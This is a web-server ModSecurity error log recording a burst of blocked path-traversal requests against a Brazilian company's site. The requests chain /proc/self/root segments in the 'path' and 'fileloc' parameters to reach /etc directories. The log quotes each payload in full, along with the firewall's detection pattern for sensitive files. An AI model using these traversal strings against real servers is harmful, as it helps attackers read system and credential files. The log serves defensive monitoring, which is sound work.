[Mon Mar 16 14:28:51.813923 2026] [:error] [pid 11972:tid 140411725141760] [client 74.7.243.203:53002] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg905qj1wV0Si-Okef3_gAAAAI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:28:53.184109 2026] [:error] [pid 14895:tid 140411607643904] [client 74.7.243.203:53018] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg91VajLEzk2WiQ-10bqAAAApA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:28:56.731567 2026] [:error] [pid 10651:tid 140411733534464] [client 74.7.243.203:53022] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg92LysWC90G-1nBrBNmAAAAYE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:28:59.042297 2026] [:error] [pid 21533:tid 140411632822016] [client 74.7.243.203:53034] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg923jZBu2q05ozVU9ifAAAAU0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:29:00.383171 2026] [:error] [pid 10831:tid 140411624429312] [client 74.7.243.203:46334] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg93I6lpbStxTqkSkt1kgAAAk4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:29:10.542687 2026] [:error] [pid 11972:tid 140411691570944] [client 74.7.243.203:46340] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg95pqj1wV0Si-Okef4BwAAAAY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:29:11.847700 2026] [:error] [pid 15061:tid 140411548894976] [client 74.7.243.203:57676] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg956TCbgAP5jq5Teg0swAAAtc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:29:16.515434 2026] [:error] [pid 21805:tid 140411540502272] [client 74.7.243.203:57684] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg97LABkC4fWIHEf8H4mgAAAFg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:29:23.797114 2026] [:error] [pid 21533:tid 140411733534464] [client 74.7.244.31:43236] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abg983jZBu2q05ozVU9ifwAAAUE"]
[Mon Mar 16 14:29:30.075370 2026] [:error] [pid 14895:tid 140411733534464] [client 74.7.243.203:57690] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg9-lajLEzk2WiQ-10btwAAAoE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:29:34.720423 2026] [:error] [pid 21806:tid 140411658000128] [client 74.7.243.203:42452] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg9_tSswJuvopo3lOhoggAAAIo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:29:39.768880 2026] [:error] [pid 10651:tid 140411590858496] [client 74.7.243.203:42468] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-A7ysWC90G-1nBrBNogAAAZI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:29:42.147660 2026] [:error] [pid 14895:tid 140411666392832] [client 74.7.243.203:39558] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-BlajLEzk2WiQ-10buQAAAok"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:29:43.461268 2026] [:error] [pid 15568:tid 140411540502272] [client 74.7.243.203:39578] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-B6QpVkWug9HeOt8_SAAAA1g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:29:44.633953 2026] [:error] [pid 10831:tid 140411666392832] [client 74.7.243.203:39584] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-CI6lpbStxTqkSkt1lQAAAkk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:29:44.896095 2026] [:error] [pid 21806:tid 140411599251200] [client 74.7.241.46:41956] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-CNSswJuvopo3lOhojQAAAJE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:29:47.306104 2026] [:error] [pid 15568:tid 140411658000128] [client 74.7.243.203:39592] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-C6QpVkWug9HeOt8_UAAAA0o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:29:48.347545 2026] [:error] [pid 15568:tid 140411649607424] [client 74.7.241.46:45484] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-DKQpVkWug9HeOt8_UQAAA0s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:29:49.615954 2026] [:error] [pid 21805:tid 140411658000128] [client 74.7.241.46:48890] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-DbABkC4fWIHEf8H4mwAAAEo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:29:49.707741 2026] [:error] [pid 10831:tid 140411641214720] [client 74.7.243.203:39608] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-DY6lpbStxTqkSkt1mAAAAkw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:29:50.821956 2026] [:error] [pid 11972:tid 140411649607424] [client 74.7.241.46:48904] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-Dpqj1wV0Si-Okef4EAAAAAs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:29:52.107287 2026] [:error] [pid 14895:tid 140411649607424] [client 74.7.241.46:48910] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-EFajLEzk2WiQ-10bvQAAAos"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
